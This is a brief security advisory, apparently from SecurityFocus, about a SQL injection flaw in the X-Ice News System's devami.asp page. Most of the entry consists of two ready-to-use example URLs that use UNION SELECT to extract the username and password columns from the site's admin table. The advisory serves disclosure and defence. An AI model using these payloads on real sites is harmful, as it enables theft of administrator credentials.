X-Ice News System DevAMI.ASP SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following URI examples are available:

http://www.example.com/devami.asp?id=-1+union+select+0,kullaniciadi,2,3,4,5,6,7+from+admin
http://www.example.com/devami.asp?id=-1+union+select+0,sifre,2,3,4,5,6,7+from+admin


 

Privacy Statement
Copyright 2010, SecurityFocus